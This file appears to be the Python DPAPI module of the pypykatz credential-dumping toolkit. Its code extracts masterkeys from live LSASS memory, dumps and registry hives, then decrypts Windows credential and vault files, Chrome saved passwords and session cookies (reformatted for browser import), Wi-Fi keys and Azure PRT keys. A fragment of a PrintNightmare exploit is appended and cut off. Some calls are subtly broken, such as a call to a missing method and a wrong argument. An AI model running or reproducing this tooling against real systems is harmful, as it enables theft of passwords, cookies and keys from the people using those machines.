#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
# 
# Kudos:
#  Processus Thief (@ProcessusT)
#
#

import os
import ntpath
import json
import hmac
import glob
import sqlite3
import base64
import platform
from hashlib import sha1, pbkdf2_hmac

import xml.etree.ElementTree as ET

from pypykatz import logger
from pypykatz.dpapi.structures.masterkeyfile import MasterKeyFile
from pypykatz.dpapi.structures.credentialfile import CredentialFile, CREDENTIAL_BLOB
from pypykatz.dpapi.structures.blob import DPAPI_BLOB
from pypykatz.dpapi.structures.vault import VAULT_VCRD, VAULT_VPOL, VAULT_VPOL_KEYS
from unicrypto.hashlib import md4 as MD4
from unicrypto.symmetric import AES, MODE_GCM, MODE_CBC
from winacl.dtyp.wcee.pvkfile import PVKFile
from pypykatz.commons.common import UniversalEncoder, base64_decode_url


from cryptography.hazmat.primitives.asymmetric.padding import PKCS1v15


if platform.system().lower() == 'windows':
	from pypykatz.commons.winapi.processmanipulator import ProcessManipulator

"""
So! DPAPI...

In order to decrpyt a file/blob/data of any kind you must obtain a masterkey.
Masterkey can be obtained either from the LSASS process, or by decrypting a masterkeyfile. LSASS is straightforward, succsessfully dumping it will give you all the plaintext masterkeys with the appropriate GUID.
 But if you can't use LSASS, you have to obtain the masterkey file, and decrypt it with an appropriate key. (too many keys, I know...)
 Masterkey files can be located in '%APPDATA%\Microsoft\Protect\%SID%' for each user or '%SYSTEMDIR%\Microsoft\Protect' for the SYSTEM user. But how to decrypt them?
 A masterkeyfile can contain multiple different keys, a masterkey is one of them. The masterkey is stored encrypted in the masterkeyfile, and is encrypted with a key that can be either a key stored in registry (LSA secrets) or not. In case the LSA DPAPI keys are not valid, you will need to use the NT hash of the user's password or the user's plaintext password itself. BUT! deriving the key from the password and the SID will yield 3 different keys, and so far noone could tell what key is the correct one to be used.
 Solution for decrypting a masterkey in the mastereky file: harvest as many key candidates as possible and try to decrypt the masterkey. Much to our luck, verifying the signature data after decryption can tell us if the decrpytion was sucsessfull, so we can tell if the masterkey decrypted correctly or not.

But you may ask: I see a lot of different masterkey files, how can I tell which one is used for my <credential file/vault files/blob>. The answer: a masterkeyfile stores GUID of the keys it stores (eg. the masterkey), and so does your <secret> data sructure for the appropriate key. Therefore it's easy to tell which file to decrypt for a given <secret>

BUT WAIT! THERE IS MORE!

DPAPI is also used to decrypt stroed secrets in Windows Vault and Credential files.
Credential files:
	1. standalone file, inside it there is a DPAPI_BLOB.
	2. DPAPI_BLOB can be decrypted with the corresponding masterkey
	3. After decryption you'll find a CREDENTIAL_BLOB strucutre.
	4. CREDENTIAL_BLOB strucutre has the plaintext secrets, but it's not possible to tell in which filed they are stored. You'll need to check them by hand :)
	
Vault files (VCRD and VPOL):
	VCRD file holds the secrets encrypted. The decrpytion key is stored in the VPOL file, but also encryted. The VPOL file's decryption key is a masterkey. The masterkey is stored in a Masterkeyfile...
	1. Need to find the masterkey to decrypt the VPOL file
	2. VPOL file will give two keys after sucsessful decryption
	3. There is no way to tell (atm) which key will be the correct one to decrypt the VCRD file
	4. The VCRD file has a lot of stored secrets, called attributes. Each attribute is encrypted with one of the keys from the VPOL file
	5. For each attribute: for each key: decrypt attribute.
	6. Check manually if one of them sucseeded because there are no integrity checks, so no way to tell programatically which key worked.
	
Path to decrypt stuff:
	Sub-sections are options of how to get the keys
	
	1. pre_masterkey:
		a, from user password and SID
		b, from user NT hash and SID
		c, from live registry SYSTEM cached DPAPI key or SAM cache NT hash and SID
		d, from offline registry hives
		
	2. masterkey:
		a, from masterkeyfile + pre_masterkey
		b, from live LSASS dump
		c, from offline LSASS dump
		
	3. credential file:
		a, masterkey + credential_file
		
	3. VPOL file:
		a, masterkey + VPOL file
		
	3. VCRED file:
		a, VPOL file + VCRED file
		
	3. DPAPI_BLOB:
		a, masterkey

TODO: A LOT! currently fetching backupkeys from the DC is not supported. and probably missing a lot of things in the strucutre parsing :(
"""

class DPAPI:
	def __init__(self, use_winapi = False):
		self.use_winapi = use_winapi
		self.prekeys = {} #keys in bytes format stored in a dict for avoiding dupes
		
		#masterkey, backupkey
		self.masterkeys = {} #guid -> binary value
		self.backupkeys = {} #guid -> binary value
		
		#since so far I dunno how to match vault-keys to vaults, its a list :(
		self.vault_keys = []
	

	def dump_pre_keys(self, filename = None):
		if filename is None:
			for x in self.prekeys:
				print(x.hex())
		else:
			with open(filename, 'w', newline = '') as f:
				for x in self.prekeys:
					f.write(x.hex() + '\r\n')

	def load_prekeys(self, filename):
		try:
			open(filename, 'r')
		except Exception as e:
			key = bytes.fromhex(filename)
			self.prekeys[key] = 1
			return
		else:
			with open(filename, 'r') as f:
				for line in f:
					line = line.strip()
					self.prekeys[bytes.fromhex(line)] = 1

	def dump_masterkeys(self, filename = None):
		if filename is None:
			for x in self.masterkeys:
				print('[GUID] %s [MASTERKEY] %s' % (x, self.masterkeys[x].hex()))
			for x in self.backupkeys:
				print('[GUID] %s [BACKUPKEY] %s' % (x, self.backupkeys[x].hex()))
		else:
			with open(filename, 'w', newline = '') as f:
				t = { 'masterkeys' : self.masterkeys, 'backupkeys': self.backupkeys}
				f.write(json.dumps(t, cls = UniversalEncoder, indent=4, sort_keys=True))

	def load_masterkeys(self, filename):
		with open(filename, 'r') as f:
			data = json.loads(f.read())
		

		for guid in data['backupkeys']:
			self.backupkeys[guid] = bytes.fromhex(data['backupkeys'][guid])
		for guid in data['masterkeys']:
			self.masterkeys[guid] = bytes.fromhex(data['masterkeys'][guid])

		
	def get_prekeys_from_password(self, sid, password = None, nt_hash = None):
		"""
		Creates pre-masterkeys from user SID and password of nt hash.
		If NT hash is provided the function can only generate 2 out of the 3 possible keys, 
		this is because one of the derived keys relies ion the SHA1 hash of the user password
		
		sid: user's SID as a string
		password: user's password. optional. if not provided, then NT hash must be provided
		nt_hash: user's NT hash. optional if not provided, the password must be provided
		"""
		if password is None and nt_hash is None:
			raise Exception('Provide either password or NT hash!')
		
		if password is None and nt_hash:
			if isinstance(nt_hash, str):
				nt_hash = bytes.fromhex(nt_hash)
			key1 = None
		
		if password or password == '':
			ctx = MD4(password.encode('utf-16le'))
			nt_hash = ctx.digest()

			# Will generate two keys, one with SHA1 and another with MD4
			key1 = hmac.new(sha1(password.encode('utf-16le')).digest(), (sid + '\0').encode('utf-16le'), sha1).digest()
		
		key2 = hmac.new(nt_hash, (sid + '\0').encode('utf-16le'), sha1).digest()
		# For Protected users
		tmp_key = pbkdf2_hmac('sha256', nt_hash, sid.encode('utf-16le'), 10000)
		tmp_key_2 = pbkdf2_hmac('sha256', tmp_key, sid.encode('utf-16le'), 1)[:16]
		key3 = hmac.new(tmp_key_2, (sid + '\0').encode('utf-16le'), sha1).digest()[:20]
		
		if key1 is not None:
			self.prekeys[key1] = 1
		self.prekeys[key2] = 1
		self.prekeys[key3] = 1
		
		if key1 is not None:
			logger.debug('Prekey_1 %s %s %s %s' % (sid, password, nt_hash, key1.hex()))
		logger.debug('Prekey_2 %s %s %s %s' % (sid, password, nt_hash, key2.hex()))
		logger.debug('Prekey_3 %s %s %s %s' % (sid, password, nt_hash, key3.hex()))
		
		return key1, key2, key3
				
	def __get_registry_secrets(self, lr):
		"""
		Gets the pre-keys from an already parsed OffineRegistry or LiveRegistry object, populates the userkey/machinekey lists, returns the obtained keys
		
		lr: OffineRegistry or LiveRegistry object
		return: touple of two lists, [0] userkeys [1] machinekeys
		"""
		user = []
		machine = []
		from pypykatz.registry.security.common import LSASecretDPAPI

		if lr.security:
			for secret in lr.security.cached_secrets:
				if isinstance(secret, LSASecretDPAPI):
					logger.debug('[DPAPI] Found DPAPI user key in registry! Key: %s' % secret.user_key)
					logger.debug('[DPAPI] Found DPAPI machine key in registry! Key: %s' % secret.machine_key)
					self.prekeys[secret.user_key] = 1
					user.append(secret.user_key)
					self.prekeys[secret.machine_key] = 1
					machine.append(secret.machine_key)
		
		if lr.sam is not None:
			for secret in lr.sam.secrets:
				if secret.nt_hash:
					sid = '%s-%s' % (lr.sam.machine_sid, secret.rid)
					x, key2, key3 = self.get_prekeys_from_password(sid, nt_hash = secret.nt_hash)
					logger.debug('[DPAPI] NT hash method. Calculated user key for user %s! Key2: %s Key3: %s' % (sid, key2, key3))
					user.append(key2)
					user.append(key3)
					continue
					
		return user, machine
	
	def get_prekeys_form_registry_live(self):
		"""
		
		return: touple of two lists, [0] userkeys [1] machinekeys
		"""
		from pypykatz.registry.live_parser import LiveRegistry
		from pypykatz.registry.offline_parser import OffineRegistry
		lr = None
		try:
			lr = LiveRegistry.go_live()
		except Exception as e:
			logger.debug('[DPAPI] Failed to obtain registry secrets via direct registry reading method')
			try:
				lr = OffineRegistry.from_live_system()
			except Exception as e:
				logger.debug('[DPAPI] Failed to obtain registry secrets via filedump method')
		
		if lr is not None:
			return self.__get_registry_secrets(lr)

		else:
			raise Exception('Registry parsing failed!')
			
	def get_prekeys_form_registry_files(self, system_path, security_path, sam_path = None):
		"""
		
		return: touple of two lists, [0] userkeys [1] machinekeys
		"""
		from pypykatz.registry.offline_parser import OffineRegistry
		lr = None
		try:
			lr = OffineRegistry.from_files(system_path, sam_path = sam_path, security_path = security_path)
		except Exception as e:
			logger.error('[DPAPI] Failed to obtain registry secrets via direct registry reading method. Reason: %s' %e)
		
		if lr is not None:
			return self.__get_registry_secrets(lr)

		else:
			raise Exception('[DPAPI] Registry parsing failed!')
			
	def get_all_keys_from_lsass_live(self):
		"""
		Parses the live LSASS process and extracts the plaintext masterkeys, and also generates prekeys from all available credentials
		It does not retun anything, just sets up all key material in the object
		return: None
		"""
		from pypykatz.pypykatz import pypykatz
		katz = pypykatz.go_live()
		sids = [katz.logon_sessions[x].sid for x in katz.logon_sessions]
		for x in katz.logon_sessions:
			for dc in katz.logon_sessions[x].dpapi_creds:
				logger.debug('[DPAPI] Got masterkey for GUID %s via live LSASS method' % dc.key_guid)
				self.masterkeys[dc.key_guid] = bytes.fromhex(dc.masterkey)
			
			for package,_,_, nthex, lmhex, shahex, _,_,_, plaintext in katz.logon_sessions[x].to_grep_rows():
				if package.lower() == 'dpapi':
					continue
				
				sids = [katz.logon_sessions[x].sid]
				for sid in sids:
					if plaintext is not None:
						self.get_prekeys_from_password(sid, password = plaintext, nt_hash = None)
					if nthex is not None and len(nthex) == 32:
						self.get_prekeys_from_password(sid, password = None, nt_hash = nthex)
				
				if shahex is not None and len(shahex) == 40:
					self.prekeys[bytes.fromhex(shahex)] = 1
			
	def get_masterkeys_from_lsass_live(self):
		"""
		Parses the live LSASS process and extracts the plaintext masterkeys
		
		return: dictionary of guid->keybytes
		"""
		from pypykatz.pypykatz import pypykatz
		katz = pypykatz.go_live()
		for x in katz.logon_sessions:
			for dc in katz.logon_sessions[x].dpapi_creds:
				logger.debug('[DPAPI] Got masterkey for GUID %s via live LSASS method' % dc.key_guid)
				self.masterkeys[dc.key_guid] = bytes.fromhex(dc.masterkey)
		
		return self.masterkeys
				
	def get_masterkeys_from_lsass_dump(self, file_path):
		"""
		Parses the mindiump of an LSASS process file and extracts the plaintext masterkeys
		
		file_path: path to the mindiump file
		return: dictionary of guid->keybytes
		"""
		from pypykatz.pypykatz import pypykatz
		katz = pypykatz.parse_minidump_file(file_path)
		for x in katz.logon_sessions:
			for dc in katz.logon_sessions[x].dpapi_creds:
				logger.debug('[DPAPI] Got masterkey for GUID %s via minidump LSASS method' % dc.key_guid)
				self.masterkeys[dc.key_guid] = bytes.fromhex(dc.masterkey)

		for package,_,_, nthex, lmhex, shahex, _,_,_, plaintext in katz.logon_sessions[x].to_grep_rows():
				if package.lower() == 'dpapi':
					continue
				
				sids = [katz.logon_sessions[x].sid]
				for sid in sids:
					if plaintext is not None:
						self.get_prekeys_from_password(sid, password = plaintext, nt_hash = None)
					if nthex is not None and len(nthex) == 32:
						self.get_prekeys_from_password(sid, password = None, nt_hash = nthex)
				
				if shahex is not None and len(shahex) == 40:
					self.prekeys[bytes.fromhex(shahex)] = 1
				
		return self.masterkeys

	def decrypt_masterkey_file_with_pvk(self, mkffile, pvkfile):
		"""
		Decrypting the masterkeyfile using the domain backup key in .pvk format
		"""
		with open(mkffile, 'rb') as fp:
			data = fp.read()
		mkf = MasterKeyFile.from_bytes(data)
		dk = mkf.domainkey.secret
		privkey = PVKFile.from_file(pvkfile).get_key()
		decdk = privkey.decrypt(dk[::-1], PKCS1v15())
		secret = decdk[8:72] # TODO: proper file format would be good here!!!
		self.masterkeys[mkf.guid] = secret
		return self.masterkeys
			
	def decrypt_masterkey_file(self, file_path, key = None):
		"""
		Decrypts Masterkeyfile
		file_path: path to Masterkeyfile
		key: raw bytes of the decryption key. If not supplied the function will look for keys already cached in the DPAPI object.
		returns: CREDENTIAL_BLOB object
		"""
		with open(file_path, 'rb') as f:
			return self.decrypt_masterkey_bytes(f.read(), key = key)
	
	def decrypt_masterkey_bytes(self, data, key = None):
		"""
		Decrypts Masterkeyfile bytes
		data: bytearray of the masterkeyfile
		key: bytes describing the key used for decryption
		returns: touple of dictionaries. [0] - > masterkey[guid] = key, [1] - > backupkey[guid] = key
		"""
		mkf = MasterKeyFile.from_bytes(data)
		mks = {}
		bks = {}
		if mkf.masterkey is not None:
			if mkf.guid in self.masterkeys:
				mks[mkf.guid] = self.masterkeys[mkf.guid]
				
			else:
				for user_key in self.prekeys:
					dec_key = mkf.masterkey.decrypt(user_key)
					if dec_key:
						logger.debug('user key win: %s' % user_key.hex())
						self.masterkeys[mkf.guid] = dec_key
						mks[mkf.guid] = dec_key
						break
						
				if key is not None:
					dec_key = mkf.masterkey.decrypt(key)
					if dec_key:
						self.masterkeys[mkf.guid] = dec_key
						mks[mkf.guid] = dec_key
		
		if mkf.backupkey is not None:
			if mkf.guid in self.masterkeys:
				mks[mkf.guid] = self.masterkeys[mkf.guid]
				
			else:
				for user_key in self.prekeys:
					dec_key = mkf.backupkey.decrypt(user_key)
					if dec_key:
						self.backupkeys[mkf.guid] = dec_key
						bks[mkf.guid] = dec_key
						break
						
				if key is not None:
					dec_key = mkf.backupkey.decrypt(key)
					if dec_key:
						self.masterkeys[mkf.guid] = dec_key
						bks[mkf.guid] = dec_key
					
		return mks, bks
	
	def decrypt_credential_file(self, file_path):
		"""
		Decrypts CredentialFile
		file_path: path to CredentialFile
		returns: CREDENTIAL_BLOB object
		"""
		with open(file_path, 'rb') as f:
			return self.decrypt_credential_bytes(f.read())
	
	def decrypt_credential_bytes(self, data):
		"""
		Decrypts CredentialFile bytes
		CredentialFile holds one DPAPI blob, so the decryption is straightforward, and it also has a known structure for the cleartext.
		Pay attention that the resulting CREDENTIAL_BLOB strucutre's fields can hold the secrets in wierd filenames like "unknown"
		
		data: CredentialFile bytes
		returns: CREDENTIAL_BLOB object
		"""
		cred = CredentialFile.from_bytes(data)
		dec_data = self.decrypt_blob_bytes(cred.data)
		cb = CREDENTIAL_BLOB.from_bytes(dec_data)
		return cb
		
	def decrypt_blob(self, dpapi_blob, key = None):
		"""
		Decrypts a DPAPI_BLOB object
		The DPAPI blob has a GUID attributes which indicates the masterkey to be used, also it has integrity check bytes so it is possible to tell is decryption was sucsessfull.
		
		dpapi_blob: DPAPI_BLOB object
		key: raw bytes of the decryption key. If not supplied the function will look for keys already cached in the DPAPI object.
		returns: bytes of the cleartext data
		"""
		if key is None:
			logger.debug('[DPAPI] Looking for master key with GUID %s' % dpapi_blob.masterkey_guid)
			if dpapi_blob.masterkey_guid not in self.masterkeys:
				raise Exception('No matching masterkey was found for the blob!')
			key = self.masterkeys[dpapi_blob.masterkey_guid]
		return dpapi_blob.decrypt(key)
		
	def decrypt_blob_bytes(self, data, key = None):
		"""
		Decrypts DPAPI_BLOB bytes.
		
		data: DPAPI_BLOB bytes
		returns: bytes of the cleartext data
		"""
		if self.use_winapi is True:
			from pypykatz.dpapi.functiondefs.dpapi import CryptUnprotectData
			return CryptUnprotectData(data)
		
		blob = DPAPI_BLOB.from_bytes(data)
		logger.debug(str(blob))
		return self.decrypt_blob(blob, key = key)
		
	def decrypt_vcrd_file(self, file_path):
		"""
		Decrypts a VCRD file
		Location: %APPDATA%\Local\Microsoft\Vault\%GUID%\<>.vcrd
		
		file_path: path to the vcrd file
		returns: dictionary of attrbitues as key, and a list of possible decrypted data
		"""
		with open(file_path, 'rb') as f:
			return self.decrypt_vcrd_bytes(f.read())
			
	def decrypt_vcrd_bytes(self, data):
		"""
		Decrypts VCRD file bytes.
		
		data: VCRD file bytes
		returns: dictionary of attrbitues as key, and a list of possible decrypted data
		"""
		vv = VAULT_VCRD.from_bytes(data)
		return self.decrypt_vcrd(vv)
		
	def decrypt_vcrd(self, vcrd):
		"""
		Decrypts the attributes found in a VCRD object, and returns the cleartext data candidates
		A VCRD file can have a lot of stored credentials inside, most of them with custom data strucutre
		It is not possible to tell if the decryption was sucsesssfull, so treat the result accordingly
		
		vcrd: VAULT_VCRD object
		key: bytes of the decryption key. optional. If not supplied the function will look for stored keys.
		returns: dictionary of attrbitues as key, and a list of possible decrypted data
		"""
		
		def decrypt_attr(attr, key):
			if attr.data is not None:
				if attr.iv is not None:
					cipher = AES(key, MODE_CBC, attr.iv)
				else:
					cipher = AES(key, MODE_CBC, b'\x00'*16)
				
				cleartext = cipher.decrypt(attr.data)
				return cleartext
		
		res = {}
		for i, key in enumerate(self.vault_keys):
			for attr in vcrd.attributes:
				cleartext = decrypt_attr(attr, key)
				if attr not in res:
					res[attr] = []
				res[attr].append(cleartext)
		return res
					
	def decrypt_vpol_bytes(self, data):
		"""
		Decrypts the VPOL file, and returns the two keys' bytes
		A VPOL file stores two encryption keys.
		
		data: bytes of the VPOL file
		returns touple of bytes, describing two keys
		"""
		vpol = VAULT_VPOL.from_bytes(data)
		res = self.decrypt_blob_bytes(vpol.blobdata)
		
		keys = VAULT_VPOL_KEYS.from_bytes(res)
		
		self.vault_keys.append(keys.key1.get_key())
		self.vault_keys.append(keys.key2.get_key())
		
		return keys.key1.get_key(), keys.key2.get_key()
		
	def decrypt_vpol_file(self, file_path):
		"""
		Decrypts a VPOL file
		Location: %APPDATA%\Local\Microsoft\Vault\%GUID%\<>.vpol
		
		file_path: path to the vcrd file
		keys: Optional.
		returns: touple of bytes, describing two keys
		"""
		with open(file_path, 'rb') as f:
			return self.decrypt_vpol_bytes(f.read())

	def decrypt_securestring_bytes(self, data):
		return self.decrypt_blob_bytes(data)
		
	def decrypt_securestring_hex(self, hex_str):
		return self.decrypt_securestring_bytes(bytes.fromhex(hex_str))
	
	def decrypt_securestring_file(self, file_path):
		with open(file_path, 'r') as f:
			data = f.read()
		return self.decrypt_securestring_hex(data)
		
	
	@staticmethod
	def find_masterkey_files_live():
		windows_loc = DPAPI.get_windows_dir_live()
		user_folder = DPAPI.get_users_dir_live()
		
		return DPAPI.find_masterkey_files_offline(user_folder, windows_loc)
	
	@staticmethod
	def find_masterkey_files_offline(users_path, windows_path):
		def is_guid(fname):
			if os.path.isfile(filename) is True:
				base = ntpath.basename(filename)
				if base.find('-') == -1:
					return False
				try:
					bytes.fromhex(base.replace('-',''))
				except:
					return False
				return True
			return False
		
		masterkey_files = {}
		for filename in glob.glob(os.path.join(windows_path, "System32","Microsoft","Protect", "**"), recursive = True):
			if is_guid(filename) is True:
				logger.debug('GUID SYSTEM FILE: %s' % filename)
				masterkey_files[ntpath.basename(filename)] = filename
		
		user_folders = {}
		for filename in glob.glob(os.path.join(users_path, '*'), recursive=False):
			if os.path.isdir(filename):
				user_folders[filename] = 1
		
		for subfolder in ['Local', 'Roaming', 'LocalLow']:
			for user_folder in user_folders:
				for filename in glob.glob(os.path.join(user_folder, "AppData", subfolder, "Microsoft", "Protect", '**'), recursive = True):
					if is_guid(filename) is True:
						masterkey_files[ntpath.basename(filename)] = filename
						logger.debug('GUID USER FILE: %s' % filename)
		
		return masterkey_files
	
	@staticmethod
	def get_users_dir_live():
		username = os.environ.get('USERNAME')
		userprofile_loc = os.environ.get('USERPROFILE')
		username = os.environ.get('USERNAME')
		return userprofile_loc[:-len(username)]
	
	@staticmethod
	def get_windows_dir_live():
		return os.environ.get('SystemRoot')

	@staticmethod
	def get_windows_drive_live():
		return os.environ.get('SystemDrive')[0]
	
	@staticmethod
	def find_chrome_database_file_live():
		return DPAPI.find_chrome_database_file_offline(DPAPI.get_users_dir_live())
	
	@staticmethod
	def find_chrome_database_file_offline(users_path):
		db_paths = {} # username -> files
		user_folders = {} # username -> folder
		
		for filename in glob.glob(os.path.join(users_path, '*'), recursive=False):
			if os.path.isdir(filename):
				username = ntpath.basename(filename)
				if username not in user_folders:
					user_folders[username] = []
				user_folders[username].append(filename)
				
		for subfolder_1 in ['Local', 'Roaming', 'LocalLow']:
			for subfolder_2 in ['', 'Google']:
				for username in user_folders:
					if username not in db_paths:
						db_paths[username] = {}
					for user_folder in user_folders[username]:
						db_path = os.path.join(user_folder, 'AppData', subfolder_1, subfolder_2, 'Chrome','User Data','Default','Login Data' )
						if os.path.isfile(db_path) is True:
							db_paths[username]['logindata'] = db_path
							logger.debug('CHROME LOGINS DB FILE: %s' % db_path)

						db_cookies_path = os.path.join(user_folder, 'AppData', subfolder_1, subfolder_2, 'Chrome','User Data','Default','Cookies' )
						if os.path.isfile(db_cookies_path) is True:
							db_paths[username]['cookies'] = db_cookies_path
							logger.debug('CHROME COOKIES DB FILE: %s' % db_cookies_path)

						localstate_path = os.path.join(user_folder, 'AppData', subfolder_1, subfolder_2, 'Chrome','User Data', 'Local State' )
						if os.path.isfile(localstate_path) is True:
							db_paths[username]['localstate'] = localstate_path
							logger.debug('CHROME localstate FILE: %s' % localstate_path)
				
		return db_paths
	
	@staticmethod
	def get_chrome_encrypted_secret(db_path, dbtype):
		results = {}
		results['logins'] = []
		results['cookies'] = []
		results['localstate'] = []

		try:
			conn = sqlite3.connect(db_path)
			cursor = conn.cursor()
		except Exception as e:
			logger.debug('Failed to open chrome DB file %s' % db_path)
			return results
		
		if dbtype.lower() == 'cookies':
			try:
				#totally not stolen from here https://github.com/byt3bl33d3r/chrome-decrypter/blob/master/chrome_decrypt.py
				cursor.execute('SELECT host_key, name, path, encrypted_value FROM cookies')
			except Exception as e:
				logger.debug('Failed perform query on chrome DB file %s Reason: %s' % (db_path, e))
				return results
			
			for host_key, name, path, encrypted_value in cursor.fetchall():
				results['cookies'].append((host_key, name, path, encrypted_value))

		elif dbtype.lower() == 'logindata':

			try:
				#totally not stolen from here https://github.com/byt3bl33d3r/chrome-decrypter/blob/master/chrome_decrypt.py
				cursor.execute('SELECT action_url, username_value, password_value FROM logins')
			except Exception as e:
				logger.debug('Failed perform query on chrome DB file %s Reason: %s' % (db_path, e))
				return results
				
			for url, user, enc_pw in cursor.fetchall():
				results['logins'].append((url, user, enc_pw))
		
		return results
		
	def decrypt_all_chrome_live(self):
		dbpaths = DPAPI.find_chrome_database_file_live()
		return self.decrypt_all_chrome(dbpaths)
		
		
	def decrypt_all_chrome(self, dbpaths, throw = False):
		from unicrypto import use_library, get_cipher_by_name
		AES = get_cipher_by_name('AES', 'cryptography')

		results = {}
		results['logins'] = []
		results['cookies'] = []
		results['fmtcookies'] = []
		localstate_dec = None

		for username in dbpaths:
			if 'localstate' in dbpaths[username]:
				with open(dbpaths[username]['localstate'], 'r') as f:
					encrypted_key = json.load(f)['os_crypt']['encrypted_key']
					encrypted_key = base64.b64decode(encrypted_key)
				
				try:
					localstate_dec = self.decrypt_blob_bytes(encrypted_key[5:])
				except:
					if throw is True:
						raise Exception('LocalState decryption failed!')
					# this localstate was encrypted for another user...
					continue
			if 'cookies' in dbpaths[username]:
				secrets = DPAPI.get_chrome_encrypted_secret(dbpaths[username]['cookies'], 'cookies')
				for host_key, name, path, encrypted_value in secrets['cookies']:
					if encrypted_value.startswith(b'v10'):
						nonce = encrypted_value[3:3+12]
						ciphertext = encrypted_value[3+12:-16]
						tag = encrypted_value[-16:]
						cipher = AES(localstate_dec, MODE_GCM, IV=nonce, segment_size = 16)
						dec_val = cipher.decrypt(ciphertext, b'', tag)
						results['cookies'].append((dbpaths[username]['cookies'], host_key, name, path, dec_val ))
						results['fmtcookies'].append(DPAPI.cookieformatter('https://' + host_key, name, path, dec_val))
					else:
						dec_val = self.decrypt_blob_bytes(encrypted_value)
						results['cookies'].append((dbpaths[username]['cookies'], host_key, name, path, dec_val ))
						results['fmtcookies'].append(DPAPI.cookieformatter('https://' + host_key, name, path, dec_val))

			if 'logindata' in dbpaths[username]:
				secrets = DPAPI.get_chrome_encrypted_secret(dbpaths[username]['logindata'], 'logindata')
				for url, user, enc_password in secrets['logins']:
					if enc_password.startswith(b'v10'):
						nonce = enc_password[3:3+12]
						ciphertext = enc_password[3+12:-16]
						tag = enc_password[-16:]
						cipher = AES(localstate_dec, MODE_GCM, IV=nonce, segment_size = 16)
						password = cipher.decrypt(ciphertext, b'', tag)
						results['logins'].append((dbpaths[username]['logindata'], url, user, password))
					
					else:
						password = self.decrypt_blob_bytes(enc_password)
						results['logins'].append((dbpaths[username]['logindata'], url, user, password))
				
		return results
		
	def get_all_masterkeys_live(self):
		try:
			self.get_all_keys_from_lsass_live()
		except:
			logger.debug('Failed to get masterkeys/prekeys from LSASS!')
			
		try:
			self.get_prekeys_form_registry_live()
		except Exception as e:
			logger.debug('Failed to get masterkeys/prekeys from registry!')
		
		mkfiles = DPAPI.find_masterkey_files_live()
		for guid in mkfiles:
			logger.debug('Decrypting masterkeyfile with guid: %s location: %s' % (guid, mkfiles[guid]))
			mk, bk = self.decrypt_masterkey_file(mkfiles[guid])
			if len(mk) > 0 or len(bk) > 0:
				logger.debug('Decrypted masterkeyfile with guid: %s location: %s' % (guid, mkfiles[guid]))
			else:
				logger.debug('Failed to decrypt masterkeyfile with guid: %s location: %s' % (guid, mkfiles[guid]))
		
		return self.masterkeys, self.backupkeys
	
	@staticmethod
	def parse_wifi_config_file(filepath):
		wifi = {}
		tree = ET.parse(filepath)
		root = tree.getroot()

		for child in root:
			if child.tag.endswith('}name'):
				wifi['name'] = child.text
			elif child.tag.endswith('}MSM'):
				for pc in child.iter():
					if pc.tag.endswith('}keyMaterial'):
						wifi['enckey'] = pc.text
		return wifi

	@staticmethod
	def get_all_wifi_settings_offline(system_drive_letter):
		wifis = []
		for filename in glob.glob(system_drive_letter+':\\ProgramData\\Microsoft\\Wlansvc\\Profiles\\Interfaces\\**', recursive=True):
			if filename.endswith('.xml'):
				wifi = DPAPI.parse_wifi_config_file(filename)
				wifis.append(wifi)
		return wifis

	@staticmethod
	def get_all_wifi_settings_live():
		return DPAPI.get_all_wifi_settings_offline(DPAPI.get_windows_drive_live())

	def decrypt_wifi_live(self):
		# key is encrypted as system!!!
		pm = ProcessManipulator()
		try:
			try:
				pm.getsystem()
			except Exception as e:
				raise Exception('Failed to obtain SYSTEM privileges! Are you admin? Error: %s' % e)
			
			for wificonfig in DPAPI.get_all_wifi_settings_live():
				yield self.decrypt_wifi_config_file_inner(wificonfig)

		finally:
			pm.dropsystem()

	def decrypt_wifi_config_file_inner(self, wificonfig):
		if 'enckey' in wificonfig and wificonfig['enckey'] != '':
			wificonfig['key'] = self.decrypt_securestring_hex(wificonfig['enckey'])
			return wificonfig
	
	def decrypt_wifi_config_file(self, configfile):
		wificonfig = DPAPI.parse_wifi_config_file(configfile)
		return self.decrypt_wifi_config_file_inner(wificonfig)
	
	@staticmethod
	def cookieformatter(host, name, path, content):
		"""This is the data format the 'Cookie Quick Manager' uses to load cookies in FireFox"""
		return {
			"Host raw": host,      #"https://.pkgs.org/",
			"Name raw": name,      #"distro_id",
			"Path raw": path,      #"/",
			"Content raw": content,   # "196",
			"Expires": "26-05-2022 21:06:29",       # "12-05-2022 15:59:48",
			"Expires raw": "1653591989",   # "1652363988",
			"Send for": "Any type of connection", #"Encrypted connections only",
			"Send for raw": False,  #"true",
			"HTTP only raw": False, #"false",
			"SameSite raw": "lax", #"lax",
			"This domain only": False, #"Valid for subdomains",
			"This domain only raw": False, #"false",
			"Store raw": "firefox-default", #"firefox-default",
			"First Party Domain": "", #""
		}
	
	def decrypt_cloudap_key(self, keyvalue_url_b64):
		keyvalue = base64_decode_url(keyvalue_url_b64, bytes_expected=True)
		keyvalue = keyvalue[8:] # skip the first 8 bytes
		key_blob = DPAPI_BLOB.from_bytes(keyvalue)
		return self.decrypt_blob(key_blob)
	
	def decrypt_cloudapkd_prt(self, PRT):
		prt_json = json.loads(PRT)
		keyvalue = prt_json.get('ProofOfPossesionKey',{}).get('KeyValue')
		if keyvalue is None:
			raise Exception('KeyValue not found in PRT')

		keyvalue_dec = self.decrypt_cloudap_key(keyvalue)
		return keyvalue_dec



# arpparse helper
def prepare_dpapi_live(methods = [], mkf = None, pkf = None):
	dpapi = DPAPI()
	
	if mkf is not None:
		dpapi.load_masterkeys(mkf)
	if pkf is not None:
		dpapi.load_prekeys(mkf)
	
	if 'all' in methods:
		dpapi.get_all_masterkeys_live()
	if 'registry' in methods and 'all' not in methods:
		dpapi.get_prekeys_form_registry_live()
	if 'lsass' in methods and 'all' not in methods:
		dpapi.get_masterkeys_from_lsass_live()
	
	return dpapi

def main():
	mkffile = '/mnt/hgfs/!SHARED/feature/masterkeyfile - 170d0d57-e0ae-4877-bab6-6f5af49d3e8e'
	pvkfile = '/mnt/hgfs/!SHARED/feature/pvkfile - ntds_capi_0_fdf0c850-73d3-48cf-86b6-6beb609206c3.keyx.rsa.pvk'
	dpapi = DPAPI()
	dpapi.decrypt_mkf_with_pvk(mkffile, pvkfile)


if __name__ == '__main__':
	main()


import asyncio
import os

from pypykatz import logger

async def printnightmare(url, dll_path, driverpath = None):
    try:
        from aiosmb.commons.connection.factory import SMBConnectionFactory
        from aiosmb.commons.interfaces.machine import SMBMachine
        
        smburl = SMBConnectionFactory.from_url(url)
        connection = smburl.get_connection()

        async with connection:
